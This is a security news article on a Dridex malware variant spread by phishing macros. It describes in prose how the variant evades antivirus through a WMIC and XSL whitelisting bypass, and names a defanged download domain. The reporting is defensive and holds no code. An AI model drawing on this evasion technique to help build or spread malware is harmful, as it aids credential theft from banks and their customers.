Dridex returns with new antivirus evasion - including application whitelisting

News by Rene Millman

The Dridex credential-stealing malware that targets banks continues to evolve and now uses application whitelisting techniques to infect systems and evade most anti-virus defences.

A new variant of the Dridex malware has been spotted using antivirus evasion techniques in phishing emails.
According to security researchers, the new variant, discovered mid-June, uses Application Whitelisting technique to bypass mitigation via disabling or blocking of Windows Script Host. The technique takes advantage of WMI command-line (WMIC) utility's weak execution policy around xls scripts.
They said that Dridex has undergone numerous transformations as it has evolved over the last decade, first appearing as Cridex in 2011. The malware targets banking information on the victim system. It has since added other features, such as a transition to XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption.
Researchers made some observations that the campaign using Dridex is evolving. 
"Given the same-day deployment and implementation of the ssl-pert[.]com domain on June 26th and a tendency to utilise randomly generated variables and URL directories, it is probable the actors behind this variant of Dridex will continue to change up indicators throughout the current campaign," researchers said.
The malware was observed arriving through email in the form of a malicious document with embedded macros, according to researchers. Depending on the environment, the macros can be triggered by varying levels of employee interaction.  
If macros are successfully executed, they hail the ssl-pert[.]com domain to download servern.exe (the Dridex installer). The macro script uses an application whitelisting BYPASS technique first described in April of 2018 by Casey Smith (@subTee on Twitter).
Researchers said that  JavaScript code embedded in an XSL template was executed by wmic with no integrity checks.
"eSentire’s Advance Threat Analytics team noted that the XSL script removes itself, then downloads and executes the Dridex installer," said researchers.
They added that given that email is the  initial access point, employees are the first line of defence against this threat.
"Expect financial departments to be targeted by unsolicited invoices carrying malicious macros within.  Some antivirus engines were able to detect (but not specify) the suspicious behavior.  Given the rapid turnover of infrastructure and indicators, signature-based antivirus solutions will continue to have gaps throughout the Dridex campaign," they said.
Javvad Malik, security awareness advocate at KnowBe4, told SC Media UK that while the malware initially was only detected by a handful of companies, the number of antivirus products that can detect it will increase in the coming days. 
"Because the initial infection comes as a result of an email which requires a user to interact with the attachment, the best form of defence is to provide appropriate user awareness training to users so that they can best identify and report such emails and, as a result, prevent the infection from occurring altogether," he said.
Jake Moore, cyber-security specialist at ESET, told SC Media UK that it feels as long as phishing emails have been around, Dridex has not been far behind. 
"The simplest defence against this malware, yet not always possible, is to screen any unknown emails and to train staff to keep their eyes peeled for any strange looking communication as we can’t always rely purely on antivirus protection alone. Threat detection is making huge advances along with machine learning but is still in its immature phase to help thwart all attacks as seen here," he said.

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Video and interviews

Interview - Everyone has an Achilles heel: The new security paradigm

How can we defend networks now that the perimeter has all but disappeared?
Brought to you in partnership with ExtraHop